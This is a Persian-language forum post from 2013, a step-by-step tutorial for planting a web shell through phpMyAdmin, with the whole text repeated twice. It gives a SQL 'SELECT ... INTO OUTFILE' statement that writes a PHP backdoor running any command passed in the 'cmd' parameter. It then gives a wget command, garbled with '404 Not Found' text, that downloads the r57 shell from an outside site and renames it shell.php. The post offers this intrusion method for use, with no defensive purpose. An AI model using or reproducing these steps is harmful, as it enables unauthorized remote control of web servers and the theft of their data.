حامد کیانمهر
11th March 2013, 03:18
سلام خدمت دوستان عزیز امشب تصمیم گرفتم این اموزش قدیمی و هنوز مفید رو برای شما اماده کننم
خوب برای شروع به phpmyadmin لاگین میشم
http://upload7.ir/images/02543810785524102247.png
حالا روی Show MySQL system variables کلیک کنید
http://upload7.ir/images/22620985191201771280.png
و بعد SQL
http://upload7.ir/images/60872907988963302140.png
حالا ما می توانیم دستورات SQL رو اجرا کنیم ولی ما می خواهیم شل اپلود کنیم پس باید یه جایی از سرور برای خودمون کامند مخفی ایجاد کنیم
SELECT "<? system($_REQUEST['cmd']); ?>"
INTO OUTFILE "full/path/here/cmd.php
حالا روی Go کلیک می کنیم
http://upload7.ir/images/32542794062390714417.png
حالا ما در مسیر site.com/cmd.php می تونیم دستورات خود رو اجرا کنیم می تونیم شل اپلود کنیم
به وسیله این دستور شل خود رو فراخوانی کنید بر روی سرور
wget 404 Not Found (http://www.r57.biz/r57.txt;mv) r57.txt shell.php
http://upload7.ir/images/97465703062094856186.png
موفق باشید
خوب برای شروع به phpmyadmin لاگین میشم
http://upload7.ir/images/02543810785524102247.png
حالا روی Show MySQL system variables کلیک کنید
http://upload7.ir/images/22620985191201771280.png
و بعد SQL
http://upload7.ir/images/60872907988963302140.png
حالا ما می توانیم دستورات SQL رو اجرا کنیم ولی ما می خواهیم شل اپلود کنیم پس باید یه جایی از سرور برای خودمون کامند مخفی ایجاد کنیم
SELECT "<? system($_REQUEST['cmd']); ?>"
INTO OUTFILE "full/path/here/cmd.php
حالا روی Go کلیک می کنیم
http://upload7.ir/images/32542794062390714417.png
حالا ما در مسیر site.com/cmd.php می تونیم دستورات خود رو اجرا کنیم می تونیم شل اپلود کنیم
به وسیله این دستور شل خود رو فراخوانی کنید بر روی سرور
wget 404 Not Found (http://www.r57.biz/r57.txt;mv) r57.txt shell.php
http://upload7.ir/images/97465703062094856186.png
موفق باشید